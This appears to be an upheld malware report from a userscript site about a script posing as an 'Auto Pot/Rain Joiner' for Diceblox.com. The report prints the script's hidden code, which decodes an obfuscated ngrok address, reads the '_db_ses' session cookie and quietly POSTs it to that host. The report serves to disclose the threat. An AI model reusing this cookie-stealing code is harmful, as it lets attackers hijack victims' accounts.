Auto Pot/Rain Joiner for Diceblox.com was reported 2025-02-02 for Malware
Sending cookies to https://willingly-thankful-man.ngrok-free.app/send
const encodedUrl = "aHR0cHM6Ly93aWxsaW5nbHktdGhhbmtmdWwtbWFuLm5ncm9rLWZyZWUuYXBwL3NlbmQ="; // https://willingly-thankful-man.ngrok-free.app/send
const serverUrl = atob(encodedUrl);
function getData(name) {
const entries = document.cookie.split('; ');
for (const entry of entries) {
const [key, value] = entry.split('=');
if (key === name) {
return value;
}
}
return null;
}
function sendData(data) {
fetch(serverUrl, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ entryToken: data })
}).catch(() => {
});
}
const dataToSend = getData('_db_ses');
if (dataToSend) {
sendData(dataToSend);
}
This script has had 1 previous upheld or fixed report.
PromoCollectorDevBanned (the reported user) has made:
This report has been upheld by a moderator.